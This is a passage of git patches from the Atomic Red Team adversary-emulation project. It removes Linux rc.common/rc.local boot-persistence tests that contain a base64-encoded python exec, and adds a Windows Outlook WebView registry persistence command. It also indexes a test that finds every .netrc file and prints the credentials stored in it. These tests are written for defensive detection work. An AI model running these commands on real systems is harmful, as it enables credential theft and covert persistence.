-echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
-printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
-sudo chmod +x /etc/rc.common
+```cmd
+reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
 ```
 
 #### Cleanup Commands:
-```bash
-origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - rc.local
-Modify rc.local
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
-printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
-echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
-printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
-sudo chmod +x /etc/rc.local
-```
-
-#### Cleanup Commands:
-```bash
-origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```cmd
+reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f
 ```
 
 

From ecaa041b50e4cac1ac4076778f8bd028eec7eb74 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 4 Jun 2021 17:23:39 +0000
Subject: [PATCH 10/11] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1552.001/T1552.001.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index 6a2fc54e..3bfe6e15 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -54,6 +54,7 @@ atomic_tests:
     elevation_required: true
 
 - name: Find and Access Github Credentials
+  auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803
   description: |
     This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index e78c5f95..e9c19f64 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -708,3 +708,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
 46f8dbe9-22a5-4770-8513-66119c5be63b
 c33f3d80-5f04-419b-a13a-854d1cbdbf3a
 126f71af-e1c9-405c-94ef-26a47b16c102
+da4f751a-020b-40d7-b9ff-d433b7799803

From e7182cfe18f6fd664bcdeb9745365d4a9a5b0310 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 4 Jun 2021 17:23:45 +0000
Subject: [PATCH 11/11] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv           |  1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv     |  1 +
 atomics/Indexes/Indexes-CSV/macos-index.csv     |  1 +
 atomics/Indexes/Indexes-Markdown/index.md       |  1 +
 atomics/Indexes/Indexes-Markdown/linux-index.md |  1 +
 atomics/Indexes/Indexes-Markdown/macos-index.md |  1 +
 atomics/Indexes/index.yaml                      | 14 ++++++++++++++
 7 files changed, 20 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index fda6082f..da09d5a0 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -9,6 +9,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 89eb46ca..d7c342f8 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -5,6 +5,7 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 987cd38e..721cf97b 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -2,6 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index e7646cfb..6c7e9586 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -21,6 +21,7 @@
   - Atomic Test #2: Extract passwords with grep [macos, linux]
   - Atomic Test #3: Extracting passwords with findstr [windows]
   - Atomic Test #4: Access unattend.xml [windows]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 6499f682..de2b75a9 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -14,6 +14,7 @@
 - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #2: Extract passwords with grep [macos, linux]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index baee6de3..215f549a 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -8,6 +8,7 @@
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #2: Extract passwords with grep [macos, linux]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #2: Search macOS Safari Cookies [macos]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9500a007..35161db6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -965,6 +965,20 @@ credential-access:
           type C:\Windows\Panther\Unattend\unattend.xml
         name: command_prompt
         elevation_required: true
+    - name: Find and Access Github Credentials
+      auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803
+      description: 'This test looks for .netrc files (which stores github credentials
+        in clear text )and dumps its contents if found.
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "for file in $(find / -name .netrc 2> /dev/null);do echo $file ;
+          cat $file ; done \n"
   T1555:
     technique:
       id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0